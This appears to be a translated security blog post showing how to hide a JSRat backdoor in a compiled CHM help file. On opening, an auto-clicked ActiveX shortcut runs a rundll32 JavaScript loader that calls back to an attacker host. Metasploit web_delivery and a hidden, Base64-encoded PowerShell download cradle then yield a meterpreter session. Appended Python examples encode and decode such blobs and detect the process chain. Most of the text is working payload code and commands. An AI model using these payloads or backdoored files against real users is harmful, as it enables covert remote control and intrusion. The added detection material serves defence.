• CHM + JSBackdoor bundled backdoor


    Start the JSRat server in interactive mode:

    #!bash
    python MyJSRat.py -i 192.168.1.101 -p 8080
    


    Visit http://192.168.1.101:8080/wtf to obtain the attack code, which is:

    #!bash
    rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
    

    After several rounds of testing, the command above was successfully embedded in a CHM file. The HTML source is:

    #!html
    <!DOCTYPE html><html><head><title>Mousejack replay</title></head><body>
    This is a demo ! <br>
    <!-- HTML Help ActiveX control (hhctrl.ocx). Command=ShortCut launches Item1, given as ",program,arguments" -->
    <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
    <PARAM name="Command" value="ShortCut">
    <PARAM name="Button" value="Bitmap::shortcut">
    <PARAM name="Item1" value=',rundll32.exe,javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
    <PARAM name="Item2" value="273,1,1">
    </OBJECT>
    <SCRIPT>
    x.Click(); // fire the shortcut as soon as the topic is displayed, no user interaction needed
    </SCRIPT>
    </body></html>
    

    After compiling the CHM and running it, an interactive JS shell is obtained:


    Executing cmd /c command directly pops up a black console window; use run instead to avoid it. After run, enter whoami > e:1.txt, then use read to retrieve the output.

    2. Obtaining a meterpreter session

    In this test the meterpreter session is obtained by running a PowerShell command: once the interactive JS shell on the client is obtained, a PowerShell command is executed automatically and returns a meterpreter session. The steps are as follows:

    Start the MSF web_delivery module:

    #!bash
    msfconsole -Lq
    msf > use exploit/multi/script/web_delivery
    msf exploit(web_delivery) > set target 2
    target => 2
    msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(web_delivery) > set lhost 192.168.1.101
    lhost => 192.168.1.101
    msf exploit(web_delivery) > set lport 6666
    lport => 6666
    msf exploit(web_delivery) > set SRVPORT 8081
    SRVPORT => 8081
    msf exploit(web_delivery) > set uripath /
    uripath => /
    msf exploit(web_delivery) > exploit
    [*] Exploit running as background job.
    msf exploit(web_delivery) >
    [*] Started reverse TCP handler on 192.168.1.101:6666
    [*] Using URL: http://0.0.0.0:8081/
    [*] Local IP: http://192.168.1.101:8081/
    [*] Server started.
    [*] Run the following command on the target machine:
    powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
    

    Running the following command on a client that has PowerShell yields a meterpreter session:

    #!bash
    powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
    

    Because the command contains special characters, it can be Base64-encoded instead. Save the following into power.txt:

    #!bash
    $n=new-object net.webclient;
    $n.proxy=[Net.WebRequest]::GetSystemWebProxy();
    $n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
    IEX $n.downloadstring('http://192.168.1.101:8081/');
    

    Run the following command (iconv's UTF-16LE target emits no BOM, which is what -enc expects; note that GNU base64 wraps its output at 76 columns by default, so add -w 0 or join the lines before using the result):

    #!bash
    cat power.txt | iconv --to-code UTF-16LE |base64
    


    The final PowerShell command to execute is:

    #!bash
    powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==
    

    Use command-execution mode to obtain the meterpreter session directly:

    #!bash
    python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc 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"
    

    During testing, from running the CHM through obtaining meterpreter, nothing unusual was visible on the client and no console window appeared; the meterpreter session was obtained as shown in the screenshot:
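    The encoding step above (power.txt, then iconv to UTF-16LE, then base64, then powershell -enc), as an added example that is not part of the original post: a Python script that performs the same transform and its inverse, so the same code lets a defender turn an -enc blob seen on a command line back into readable PowerShell. The reconstructed power.txt content is inferred from decoding the blob printed on the page (each line begins with a space and there is no trailing newline); the function names are my own and everything else is standard library.

```python
"""Build and decode PowerShell -EncodedCommand blobs (UTF-16LE, then Base64)."""
import base64

# Reconstruction of the page's power.txt: the blob printed on the page decodes to
# these four lines, each starting with a space, joined by "\n", no trailing newline.
POWER_TXT = (
    " $n=new-object net.webclient;\n"
    " $n.proxy=[Net.WebRequest]::GetSystemWebProxy();\n"
    " $n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;\n"
    " IEX $n.downloadstring('http://192.168.1.101:8081/');"
)

# The -enc argument exactly as printed on the page.
PAGE_BLOB = (
    "IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA=="
)


def encode_ps(script: str) -> str:
    """Same transform as `iconv --to-code UTF-16LE | base64 -w 0`: no BOM, no line wrapping."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Inverse: recover the script from a -enc value found in a command line or a log."""
    return base64.b64decode(blob).decode("utf-16-le")


def build_command(script: str, exec_policy: str = "bypass") -> str:
    """The full one-liner in the form the page hands to MyJSRat -c."""
    return f"powershell -ep {exec_policy} -enc {encode_ps(script)}"


if __name__ == "__main__":
    print(build_command(POWER_TXT))
    print("--- decoded from the page's blob ---")
    print(decode_ps(PAGE_BLOB))
```

    encode_ps(POWER_TXT) reproduces the page's blob byte for byte, which also confirms that the iconv/base64 pipeline used on the page emitted neither a BOM nor line breaks; a blob produced with plain GNU base64 needs its newlines stripped before PowerShell will accept it.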


    So far I have not found any defensive technique for this; anyone who knows one is welcome to share. The best approach is to raise personal security awareness: be careful with files of this kind, avoid opening them casually, and if you must open one, do it in a virtual machine. With procexp.exe you can see that a backdoored CHM file starts a new process.
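    Following up on the last observation (Process Explorer shows the backdoored CHM spawning a new process), as an added example that is not from the original post: a small Python triage function over constructed process-creation events. It assumes each event carries pid, ppid, image name and command line (the usual fields of Sysmon Event ID 1 or comparable telemetry) and that .chm files are opened by hh.exe, the Windows HTML Help viewer. The sample events are constructed to mirror the chain on this page; the benign look-alikes show what must not fire. The rundll32 command line is written with the backslash in ..\mshtml that the page's copy lost.

```python
"""Flag the CHM -> rundll32 javascript: -> powershell -enc chain in process-creation telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # base name of the executable
    cmdline: str


# Constructed sample events (not real telemetry). hh.exe is the Windows HTML Help
# viewer that opens .chm files; the rundll32 command line is the one from the page.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "hh.exe", 'hh.exe "C:\\Users\\u\\Downloads\\demo.chm"'),
    ProcEvent(300, 200, "rundll32.exe",
              'rundll32.exe javascript:"..\\mshtml,RunHTMLApplication ";document.write();'
              'h=new ActiveXObject("WinHttp.WinHttpRequest.5.1");'
              'h.Open("GET","http://192.168.1.101:8080/connect",false);'),
    ProcEvent(400, 300, "powershell.exe", "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAt"),
    # benign look-alikes that must not fire
    ProcEvent(500, 100, "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcEvent(600, 100, "hh.exe", "hh.exe C:\\Windows\\Help\\ntcmds.chm"),
    ProcEvent(700, 100, "powershell.exe", "powershell -ep bypass -File C:\\scripts\\inventory.ps1"),
]

# -e, -ec, -enc and -EncodedCommand are accepted spellings of the flag;
# -ep (ExecutionPolicy) must not match.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s", re.IGNORECASE)


def ancestors(ev, by_pid, max_depth=5):
    """Yield parent, grandparent, ... up to max_depth levels (stops at unknown pids)."""
    cur = ev
    for _ in range(max_depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            return
        yield cur


def findings_for(ev, by_pid):
    """Return the reasons this event looks like the CHM backdoor chain (empty list if none)."""
    reasons = []
    img = ev.image.lower()
    cmd = ev.cmdline.lower()
    chain = [a.image.lower() for a in ancestors(ev, by_pid)]
    if img == "rundll32.exe" and "javascript:" in cmd:
        reasons.append("rundll32 javascript: protocol handler")
        if "runhtmlapplication" in cmd:
            reasons.append("mshtml RunHTMLApplication loader")
    if img == "powershell.exe" and ENC_FLAG.search(cmd):
        reasons.append("encoded PowerShell command")
    if reasons and "hh.exe" in chain:
        reasons.append("descends from hh.exe (CHM viewer)")
    parent = by_pid.get(ev.ppid)
    # the help viewer normally spawns nothing, so any child is worth a look on its own
    if parent is not None and parent.image.lower() == "hh.exe" and img != "hh.exe":
        reasons.append("direct child of hh.exe")
    return reasons


def triage(events):
    """Map pid -> list of reasons for every event that raised at least one."""
    by_pid = {e.pid: e for e in events}
    result = {}
    for e in events:
        reasons = findings_for(e, by_pid)
        if reasons:
            result[e.pid] = reasons
    return result


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

    Only the rundll32 launched by the help viewer and the PowerShell it chains into are reported; the legitimate rundll32 control-panel call, the help file opened from C:\Windows\Help and the -File invocation stay silent. The -enc value that the detector surfaces is plain UTF-16LE Base64 and can be decoded for context before anyone decides whether to act on it.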

  • Original article: https://www.cnblogs.com/journeyIT/p/8260124.html